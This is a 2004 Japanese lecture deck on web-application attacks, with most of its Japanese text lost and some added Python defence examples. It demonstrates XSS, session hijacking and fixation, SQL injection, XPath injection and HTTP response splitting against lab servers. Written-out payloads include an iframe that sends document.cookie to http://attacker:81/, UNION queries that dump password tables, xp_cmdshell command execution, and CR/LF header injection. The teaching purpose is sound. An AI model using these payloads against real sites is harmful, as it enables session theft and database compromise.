Web 2004 12 7 <shio@st.rim.or.jp>
Web SQL XPath HTTP 5 URL 2
SQL XPath HTTP 3
Cross-Site Scripting : XSS Web Web CGI Web IIS Apache JavaScript/VBscript Web Web IE Web Cookie ID Web Cookie 4
http://server/xss/greeting.asp 5
<h1>aaa</h1>... <h1>...</h1> heading h1 aaa 6
<script>alert("aaa")</script>... <script>...</script> JavaScript alert(...) script aaa 7
<script>alert(document.cookie)</script>... document.cookie Cookie script Cookie 8
XSS Cookie IE http://attacker/ Cookie Attacker Server Cookie xssgetcookie.pl xss-reply.pl <iframe src="http://server/xss/greeting.asp?name=<script>location.href='http://attacker:81/'+document.cookie</script>"></iframe> Cookie Attacker Attacker Server Cookie Cookie Server 9
HTML HTML < > & " ' < > & " ' (); +...... UTF-7 http://server/xss2/greeting.asp XSS 10
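Slide 10 lists the characters that must be HTML-escaped (< > & " ') and notes the UTF-7 charset problem. The Python below is an added example, not code from the original slides: it contrasts a reflection that pastes the name into the page unescaped (the greeting.asp pattern) with an escaped rendering that also declares the charset explicitly. The page layout and function names are my own assumptions.

```python
# The five HTML metacharacters the slide lists; the entity for ' matches the
# one Python's html.escape() emits.
_HTML_ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
}


def html_escape(text: str) -> str:
    """Escape every HTML metacharacter so the input renders as text, never as markup."""
    return "".join(_HTML_ESCAPES.get(ch, ch) for ch in text)


def greeting_unsafe(name: str) -> str:
    """The greeting.asp pattern from the slides: the query-string value goes straight into the page."""
    return "<h1>" + name + "</h1>"


def greeting_safe(name: str) -> str:
    """Hardened form: escape the value and pin the charset so the browser cannot
    sniff the response as UTF-7 (hypothetical page layout, not the original ASP)."""
    return (
        "<html><head>"
        '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">'
        "</head><body><h1>" + html_escape(name) + "</h1></body></html>"
    )


def contains_markup(rendered: str, needle: str = "<script") -> bool:
    """Report whether a tag survived rendering; used to compare the two renderings."""
    return needle in rendered.lower()


if __name__ == "__main__":
    probe = '<script>alert("aaa")</script>'  # the slides' own probe string
    print("unsafe:", greeting_unsafe(probe))
    print("safe:  ", greeting_safe(probe))
```

Escaping on output is the control; the charset declaration closes the UTF-7 auto-detection gap the slide mentions, which escaping alone does not.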
Web Web Web ID ID Web ID XSS Cookie URL ID ID 11
Web HTTP TCP ID ID ID ID 12
ID SID:1234 SID:1235 ID SID:1235 SID:1234 SID:1234 SID:1235 SID:1235 SID:1235 13
IIS ASP ID Cookie ASPSESSIONIDCAQRDBCS=IPHPPHBCNCNACKEPJAIBJJDI path / secure Cookie Non-Persistent IIS ID Session("auth") = true Session.Abandon 20 Session.Timeout ID ID??? 14
XSS Cookie ID http://server/db/login.asp... Web login.asp menu.asp Anne Janet ID Steven hehehe hahaha hohoho process1.asp process2.asp logout.asp 15
Attacker ID xss-reply2.pl xssgetcookie.pl ID menu.asp Server Server Web ID XSS Cookie ID Attacker ID 16
Session Fixation ID fix Web ID ID ID URL XSS Cookie Web ID ID Web 17
SID:1234 ID SID:1234 SID 1234 SID:1234 SID:1234 SID:1234 ID 1234 SID 1234 HTML ID SID:1234 SID 1234 18
XSS Cookie ID Attacker ID xss-setcookie.pl ID menu.asp Server Server... ID Server Web ID XSS /Server Cookie ID ID 19
ID ID IIS ID Web ID Cookie Hidden? XSS Web IIS http://server/db2/login.asp 20
SQL Web SQL Web SQL Structured Query Language... DB SELECT Username FROM Users WHERE Username = 'X' AND Password = 'Y'... Users Username X Password Y Username SQL X Y SQL SQL...... 21
SQL http://server/db2/menu.asp login.asp
  SELECT * FROM Passwords WHERE Name = '" & Request.Form("uid") & "' AND Password = '" & Request.Form("pass") & "'
menu.asp process1.asp process2.asp logout.asp
Passwords: Name / Password
  Steven  hehehe
  Anne    hahaha
  Janet   hohoho 22
SQL SQL ' or 'a'='a? ID aaa ' or 'a'='a
  SELECT * FROM Passwords WHERE Name = '" & Request.Form("uid") & "' AND Password = '" & Request.Form("pass") & "'
  SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = '' or 'a'='a'
SELECT... 23
SQL http://server/db2/login.asp ID aaa ' or 'a'='a... 24
SQL UNION UNION... SQL A 1111 2345 5555.................. B 8888 8765 3333.................. SELECT, FROM A UNION SELECT, FROM B 1111 2345 5555 8888 8765 3333 25
SQL UNION http://server/db2/process2.asp login.asp menu.asp process1.asp process2.asp logout.asp
  SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '%" & Request.Form("search") & "%'
Employees: LastName / FirstName / Title / Address
  Buchanan   Steven ......
  Dodsworth  Anne ......
  Leverling  Janet ...... 26
SQL UNION SQL xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '?
  SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '%" & Request.Form("search") & "%'
  SELECT LastName, FirstName, Title, Address FROM Employees WHERE FirstName LIKE '%xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '%'
Employees sysobjects... sysobjects DB 27
SQL http://server/db2/login.asp ID Steven / hehehe xxxx' union select name, id, xtype, parent_obj from sysobjects where name like '... 28
SQL sysobjects DB xtype... U: S: V:... Passwords ID xxxx' union select name, id, 'a', 'a' from syscolumns where id = Passwords ID and name like ' 29
SQL Passwords Name Password Passwords ID xxxx' union select name, password, 'a', 'a' from passwords where name like ' 30
SQL Stored procedure... MS SQL Server SQL Web MS SQL Server xp_cmdshell... OS sp_makewebtask... HTML 31
SQL xp_cmdshell sp_makewebtask
xp_cmdshell OS
  xp_cmdshell {'command_string'} [, no_output]
  exec master..xp_cmdshell 'dir *.exe'
sp_makewebtask HTML
  sp_makewebtask [@outputfile =] 'outputfile', [@query =] 'query' [,...]
  exec sp_makewebtask 'c:\inetpub\wwwroot\out.html', 'select * from passwords'
  exec sp_makewebtask 'c:\inetpub\wwwroot\out.html', "exec master..xp_cmdshell 'dir *.exe'" 32
SQL SQL xp_cmdshell server ping IP PC windump/tcpdump windump -n host IP and icmp windump http://server/icmpsniff.exe icmpsniff IP IP http://server/db2/login.asp ID aaa xxx'; exec master..xp_cmdshell 'ping IP SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = 'xxx' ; exec master..xp_cmdshell 'ping IP ' SQL 33
SQL ID SQL... ID xxx'; exec master..xp_cmdshell 'ping IP ';-- xxx SELECT * FROM Passwords WHERE Name = 'xxx' ; exec master..xp_cmdshell 'ping IP '; -- ' AND Password = 'xxx' SQL SQL 34
SQL SQL sp_makewebtask server HTML http://server/db2/login.asp ID aaa xxx'; exec sp_makewebtask 'c: inetpub wwwroot.html', "exec master..xp_cmdshell 'dir *.exe'" ; -- SELECT * FROM Passwords WHERE Name = 'aaa' AND Password = 'xxx'; exec sp_makewebtask 'c: inetpub wwwroot.html', "exec master..xp_cmdshell 'dir *.exe'" ; --' http://server/.html 35
SQL SQL SQL ' '' SQL DBMS DBMS SQL SQL prepared statements DBMS http://server/db3/login.asp SQL 36
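Slide 36 gives the two defences: doubling the single quote in each value, and prepared statements handled by the DBMS. The Python below is an added example, not code from the original slides. It uses an in-memory SQLite table seeded with the slides' Passwords rows (Steven/hehehe, Anne/hahaha, Janet/hohoho) as a stand-in for MS SQL Server, so the stored-procedure material of the deck does not apply here; it contrasts the concatenated login.asp query with the escaped and parameterized forms using the slides' own ' or 'a'='a input.

```python
import sqlite3

# Constructed stand-in for the Passwords table shown on the slides.
_ROWS = [("Steven", "hehehe"), ("Anne", "hahaha"), ("Janet", "hohoho")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the slides' Passwords table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Passwords (Name TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Passwords VALUES (?, ?)", _ROWS)
    return conn


def login_concat(conn: sqlite3.Connection, uid: str, pw: str) -> list:
    """login.asp as shown on the slides: the form values are concatenated into the SQL text."""
    sql = "SELECT * FROM Passwords WHERE Name = '" + uid + "' AND Password = '" + pw + "'"
    return conn.execute(sql).fetchall()


def _double_quotes(value: str) -> str:
    """Slide 36, mitigation 1: a ' inside a string literal is written as ''."""
    return value.replace("'", "''")


def login_escaped(conn: sqlite3.Connection, uid: str, pw: str) -> list:
    """Still concatenation, but every value is quote-doubled first."""
    sql = ("SELECT * FROM Passwords WHERE Name = '" + _double_quotes(uid)
           + "' AND Password = '" + _double_quotes(pw) + "'")
    return conn.execute(sql).fetchall()


def login_param(conn: sqlite3.Connection, uid: str, pw: str) -> list:
    """Slide 36, mitigation 2: a prepared statement; the driver passes values out of band."""
    sql = "SELECT * FROM Passwords WHERE Name = ? AND Password = ?"
    return conn.execute(sql, (uid, pw)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "' or 'a'='a"  # the slides' test input
    print("concatenated:", login_concat(db, "aaa", tautology))
    print("escaped:     ", login_escaped(db, "aaa", tautology))
    print("parameterized:", login_param(db, "aaa", tautology))
```

With the concatenated query the tautology returns every row, because AND binds tighter than OR and the trailing 'a'='a' is always true; both defences turn the same input back into an ordinary (non-matching) password string. Prepared statements are the preferred fix since they do not depend on getting the escaping rules right for a particular DBMS.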
XPath Web XPath XML XPath Web XPath XML Path Language... XML /UserList/User[Name='X' and Password='Y']... /UserList/User Name X Password Y XPath X Y XPath... XML 37
XPath http://server/xpath/auth.asp auth.asp XML
  /UserList/User[Name='" & Request.Querystring("uid") & "' and Password='" & Request.Querystring("pass") & "']
userlist.xml
  <?xml version="1.0" encoding="iso-8859-1"?>
  <UserList>
    <User>
      <Name>Steven</Name>
      <Password>hehehe</Password>
      <Title>Sales Manager</Title>
      <Address>14 Garrett Hill</Address>
    </User>
    <User>
      <Name>Anne</Name>
      <Password>hahaha</Password>
      <Title>Sales Representative</Title>
      <Address>7 Houndstooth Rd.</Address>
    </User>
    <User>
      <Name>Janet</Name>
      <Password>hohoho</Password>
      <Title>Sales Representative</Title>
      <Address>722 Moss Bay Blvd.</Address>
    </User>
  </UserList> 38
XPath XPath ' or 'a'='a? ID aaa ' or 'a'='a
  /UserList/User[Name='" & Request.Querystring("uid") & "' and Password='" & Request.Querystring("pass") & "']
  /UserList/User[Name='aaa' and Password='' or 'a'='a']
User... 39
XPath http://server/xpath/auth.asp ID aaa ' or 'a'='a... 40
XPath XPath XPath ' ' XPath "? http://server/xpath2/auth.asp XPath 41
HTTP HTTP Response Splitting HTTP Location Web Cookie 42
HTTP
  GET /redir_lang.asp?lang=english
  Server: HTTP/1.1 302 Object moved
          Location: english.html
  GET /english.html

  GET /redir_lang.asp?lang=%0d%0a%0d%0aHTTP/1.1%20200%20ok%0d%0a<html>poisoned</html>
  Server: HTTP/1.1 302 Object moved
          Location: =
          HTTP/1.1 200 ok
          <html>poisoned</html>.html 43
HTTP
  GET /redir_lang.asp?lang=%0d%0a%0d%0aHTTP/1.1%20200%20ok%0d%0a<html>poisoned</html>
  GET /index.html
  Server: HTTP/1.1 302 Object moved
          Location: =
          HTTP/1.1 200 ok
          <html>poisoned</html>.html
  TCP!! index.html <html>poisoned</html> 44
HTTP Web Attacker GET /redir_lang.asp?lang=%0d%0a%0d%0aHTTP/1.1... GET /index.html Proxy GET /redir_lang.asp?lang=%0d%0a%0d%0aHTTP/1.1... Server GET /index.html HTTP/1.1 302 Location: = GET /index.html HTTP/1.1 200 ok <html>poisoned... index.html <html>poisoned... HTTP/1.1 200 ok <html>poisoned... Proxy 45
HTTP Web http://server/rs/lang.html Apache rs-apache.pl 46
HTTP IE http://attacker/ Attacker Server <frame src=" GET /redir_lang.asp?lang=%0d%0a%0d%0aHTTP/1.1...> <frame src=" GET /index.html> rs-iepoison.pl Attacker Server index.html <html>poisoned... Server 47
HTTP XSS
  GET /redir_lang.asp?lang=%0d%0a%0d%0aHTTP/1.1%20200%20ok%0d%0a<html><script>alert(document.cookie)</script></html>
  Server: HTTP/1.1 302 Object moved
          Location: =
          HTTP/1.1 200 ok
          <html><script>alert(document.cookie)</script></html>.html
IE http://attacker/ Cookie rs-iexss.pl, xss-getcookie.pl 48
HTTP HTTP HTTP %0d%0a CR/LF HTTP Location Set-Cookie %0d%0a CR/LF... http://server/rs2/lang.html HTTP 49
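Slide 49 states the fix for response splitting: a value must not carry CR/LF (%0d%0a) into a Location or Set-Cookie header. The Python below is an added example, not code from the original slides; it models the redir_lang.asp redirect as a string builder (my own assumption about that page's logic), counts how many responses a proxy or browser would parse from the resulting stream, and adds the header-value check that refuses control characters.

```python
from urllib.parse import unquote

# The lang value from the slides, constructed here as the test input.
_PAYLOAD = "%0d%0a%0d%0aHTTP/1.1%20200%20ok%0d%0a<html>poisoned</html>"


def redirect_unsafe(lang: str) -> str:
    """redir_lang.asp as described on the slides: the decoded value is placed in Location unchecked."""
    return "HTTP/1.1 302 Object moved\r\nLocation: " + unquote(lang) + ".html\r\n\r\n"


def header_value_ok(value: str) -> bool:
    """Accept a header value only if it contains no CR, LF or other control character."""
    return not any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value)


def redirect_safe(lang: str) -> str:
    """Hardened redirect: validate the decoded value before it becomes a header line."""
    value = unquote(lang)
    if not header_value_ok(value):
        raise ValueError("control character in redirect target")
    return "HTTP/1.1 302 Object moved\r\nLocation: " + value + ".html\r\n\r\n"


def rejects(lang: str) -> bool:
    """True if the hardened redirect refuses this lang value."""
    try:
        redirect_safe(lang)
    except ValueError:
        return True
    return False


def count_responses(stream: str) -> int:
    """Count status lines, i.e. how many responses a downstream parser would see in one stream."""
    return sum(1 for line in stream.split("\r\n") if line.startswith("HTTP/1."))


if __name__ == "__main__":
    print("unsafe, normal value :", count_responses(redirect_unsafe("english")), "response(s)")
    print("unsafe, CR/LF value  :", count_responses(redirect_unsafe(_PAYLOAD)), "response(s)")
    print("safe rejects payload :", rejects(_PAYLOAD))
```

Checking the decoded value is the important detail: the %0d%0a on the wire is harmless until the server decodes it, so a filter that only inspects the raw query string can be bypassed by the decoding step itself.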
hidden Cookie HTTP... HTML SQL XPath LDAP HTTP system open... DB... Web DBMS SQL XPath HTML HTTP... 50
WASC Web Security Threat Classification http://www.webappsec.org/threat.html
OWASP Guide to Building Secure Web Applications http://www.owasp.org/documentation/guide/guide_about.html
OWASP Top Ten Most Critical Web Application Vulnerabilities http://www.owasp.org/documentation/topten.html
Cross-site Scripting Overview http://www.microsoft.com/technet/security/news/csoverv.mspx
Web Application Security http://www.patrice.ch/en/computer/web/articles/2002/web_security.pdf
@IT: http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html
Web ASP Part 1 http://www.trusnet.com/secinfo/docs/webprog1/index.html 51
Web ASP Part 2 http://www.trusnet.com/secinfo/docs/webprog2/index.html
IPA ISEC http://www.ipa.go.jp/security/awareness/vendor/programming/
http://securit.gtrc.aist.go.jp/research/paper/css2001-takagi-dist.pdf
Web 31 http://java-house.jp/~takagi/paper/iw2002-jnsa-takagi-dist.pdf
Understanding Malicious Content Mitigation for Web Developers http://www.cert.org/tech_tips/malicious_code_mitigation.html
Microsoft Windows 2000 Server : http://windows.microsoft.com/windows2000/ja/server/iis/htm/asp/iiapsess.htm
IIS Cookie SSL-Secure http://support.microsoft.com/default.aspx?scid=kb;ja;274149 52
@IT: Web http://www.atmarkit.co.jp/fsecurity/rensai/webhole01/webhole01.html
SQL Injection - Are Your Web Applications Vulnerable? http://www.spidynamics.com/papers/sqlinjectionwhitepaper.pdf
xp_cmdshell http://www.microsoft.com/japan/msdn/library/ja/tsqlref/ts_xp_aasz_4jxo.asp
sp_makewebtask http://www.microsoft.com/japan/msdn/library/ja/tsqlref/ts_sp_mamz_2p0r.asp
Blind XPath Injection http://www.sanctuminc.com/pdfc/whitepaper_blind_xpath_injection_20040518.pdf
"Divide and Conquer" - HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf 53